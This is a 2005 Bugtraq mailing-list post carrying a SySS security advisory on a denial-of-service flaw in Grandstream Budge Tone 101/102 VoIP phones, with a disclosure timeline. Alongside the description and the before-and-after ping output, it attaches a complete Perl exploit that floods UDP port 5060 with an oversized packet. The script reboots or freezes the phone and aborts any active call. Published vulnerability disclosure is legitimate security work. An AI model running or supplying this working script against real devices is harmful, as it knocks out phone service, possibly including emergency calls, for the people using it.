[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Grandstream Budge Tone 101/102 DoS Vulnerability
From:       Kroma Pierre <kroma () syss ! de>
Date:       2005-08-12 12:27:05
Message-ID: 20050812115852.9193.qmail () mail2 ! securityfocus ! com
[Download RAW message or body]

[Attachment #2 (multipart/mixed)]


- -------------------------------------------------------------------
SySS-Advisory: Grandstream Budge Tone 101/102 DoS Vulnerability
- -------------------------------------------------------------------

Problem discovered: 		July 	20th 2005
Vendor contacted: 		July 	21th 2005
Advisory will published on: 	August 	12th 2005

AUTHOR: 	Pierre Kroma (kroma@syss.de)
		SySS GmbH
		72070 Tuebingen / Germany
		Tel.: +49-7071-407856-0
Key fingerprint = 927A B13E 16F5 BBAB 8F17 75EB D8E1 A9A4 F257 4EEC

DEVICE:			Grandstream Budge Tone-101
			Grandstream Budge Tone-102
AFFECTED VERSIONS: 	perhaps all(?) <= 1.0.6.7 (firmware 1.0.6.7 tested)

EXPLOIT:		attached
VENDOR STATUS: 		informed
SEVERITY: 		medium
Remotely exploitable: 	yes

DESCRIPTION:
It is possible to initiate a D.o.S attack against this voip
(hardware-)phone. If you send an UDP packet greater than 65534 bytes 
to port 5060 the device stops working:

- any active telephone call will be aborted.
- the display will show nothing / display freeze.
- the integrated HTTP-server won't be reachable any more.

To solve the problem, you must switch the phone off and on again.

If you send a packet of exactly 65534 bytes the device may reboot.
Smaller packets have no effect.

############################################################################
EXAMPLE:
Grandstream BT101/BT102 DoS
written by pierre kroma (kroma@syss.de)

ping the remote device xxx.xxx.xxx.xxx
PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx) 56(84) bytes of data.
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=1 ttl=250 time=0.479 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=2 ttl=250 time=0.406 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=3 ttl=250 time=0.404 ms

--- xxx.xxx.xxx.xxx ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2000ms
rtt min/avg/max/mdev = 0.404/0.429/0.479/0.042 ms

Wait ...

ping the remote device xxx.xxx.xxx.xxx again
PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx) 56(84) bytes of data.

--- xxx.xxx.xxx.xxx ping statistics ---
3 packets transmitted, 0 received, 100% packet loss, time 1999ms
############################################################################

["grandstream-DoS.pl" (application/x-perl)]

#!/usr/bin/perl
#
use IO::Socket;
use Term::ANSIColor;

############################ U S A G E ###################################
system ("clear");
print "\nGrandstream BT101/BT102 DoS\n";
print "written by pierre kroma (kroma\@syss.de)\n\n";

if (!$ARGV[2]){
print qq~
Usage: perl grandstream-DoS.pl -s <ip-addr> <udp-port> {-r/-s}

	<ip-addr>  = ;-)
	<udp-port> = 5060

	-r = 'reboot' 	the Grandstream BT 101/102
	-s = 'shutdown' the Grandstream BT 101/102

~; exit;}
################################## D E F I N I T I O N S####################

$victim = $ARGV[0];
$port = $ARGV[1];
$option = $ARGV[2];

if ( $option == 'r' || $option == 'R' )
{	$request= 'k'x65534;}

if ( $option == 's' || $option == 'S' )
{	$request= 'p'x65535;}
else
{	print "Wrong parameter - try it again";
	exit;
}


# ping the remote device
print color 'bold blue';
print "\nping the remote device $victim\n";
print color 'reset';
system("ping -c 3 $victim");

print color 'bold red';
print "\n Wait ... \n\n\n";
print color 'reset';
$sox = IO::Socket::INET->new(Proto=>"udp",PeerPort=>"$port",PeerAddr=>"$victim");

print $sox $request;
sleep 1;
close $sox;

# ping the remote device
print color 'bold blue';
print "ping the remote device $victim again\n";
print color 'reset';
system("ping -c 3 $victim");


[Attachment #6 (application/pgp-signature)]

[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic